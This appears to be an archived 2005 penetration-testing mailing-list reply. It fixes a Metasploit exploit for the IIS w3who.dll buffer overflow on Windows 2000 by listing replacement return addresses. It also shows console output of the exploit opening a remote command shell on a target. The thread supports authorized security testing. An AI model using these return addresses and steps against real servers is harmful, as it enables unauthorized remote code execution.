Re: question regarding w3who.dll bug

From: H D Moore (sflist_at_digitaloffense.net)
Date: 01/15/05

  • Next message: Faisal Khan: "RE: DoS/DDoS Attack" 
    To: pen-test@securityfocus.com
Date: Sat, 15 Jan 2005 01:56:01 -0600

    The return address for Windows 2000 fails because the ImageBase for the
    DLL is different. I forget to check the base address on 2000 after fixing
    the code to work on Windows XP SP2 :-(

    A new module will be posted to metasploit.com shortly. In the meantime,
    just change the return address in the Targets section to one of the
    following:

    0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
    0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
    0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])

    If you run into any other bugs or reliability problems with the Metasploit
    Framework, *please* drop us an email at msfdev[at]metasploit.com :-)

    -HD 

    ---
msf iis_w3who_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
[*] Sending 8254 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>   
On Friday 14 January 2005 02:49, Martin Bernhard wrote:
> Hi,
>
> As one of our clients is running some IIS web servers with w3who.dll on
> them, I figured that this would be a good place to start our pen test.
> Unfortunately, the exploit in the new release of the Metasploit
> Framework did not work on the most important servers (Windows 2000). I
> have access to a test system that gives me the opportunity to analyze
> the bug in detail, but I can’t figure out what parts in memory are
> overwritten. Does anybody know what exactly I have to do to trigger the
> bug and analyze it (I’m using ollydbg)?
>
> Any help is much appreciated
  • Next message: Faisal Khan: "RE: DoS/DDoS Attack"

    Relevant Pages

    • Re: .Net packaging/wrapper application?
      ... it just didn't work well in reality due to DLL ... Windows works is to look in the executable's directory for a needed DLL ... the way apps used to work when they developed Windows. ... Looks to me like Jim is looking for the .NET equivalent of compiling ...
      (microsoft.public.dotnet.framework.aspnet)
    • Re: Unnown process... 5eplorer.exe
      ... do not remove the cause (a "super"-hidden .dll program) but only remove ... symptom files and registry settings. ... It has all permissions but 'copy' denied to everyone, ... then by using the Windows XP Recovery Console. ...
      (microsoft.public.win2000.general)
    • Re: WinSxS, functional under 2k ?
      ... The newSide-by-Side Assembly technology was introduced with Windows XP to help reduce or eliminate DLL Hell. ... If you recall earlier Windows versions, like Windows 95, when you installed an application you were warned if the installer tried to replace a DLL from the system folder with an older version and you were asked if you wanted to accept the change. ... Until Windows XP it wasn't so easy to use different versions of shared system DLLs, that is what the new Side-by-Side assemblies attempts to resolve. ...
      (microsoft.public.win2000.general)
    • Re: Determine name and path of dropped object?
      ... MDE I would really suggest the use of external DLL to hold the subclassing ... windows after loading the Microsoft Office Visual Basic Editor, ... Public Declare Sub DragAcceptFiles Lib "shell32.dll" _ ...
      (microsoft.public.access.modulesdaovba)
    • Re: .Net packaging/wrapper application?
      ... the simple answer to DLL Hell for Visual Basic apps was simply to place a copy of the needed DLLs in the same directory as your executable. ... The way Windows works is to look in the executable's directory for a needed DLL BEFORE using the registry to find one EVEN IF THE REFERENCED DLL IS REGISTERED ON THE PC RUNNING THE APPLICATION THAT NEED IT. ... Perhaps I'm getting old and but what really bothers me is nobody seems to notice this--maybe the 80s was before they got into programming. ... Looks to me like Jim is looking for the .NET equivalent of compiling with static libraries to produce a single executable. ...
      (microsoft.public.dotnet.framework.aspnet)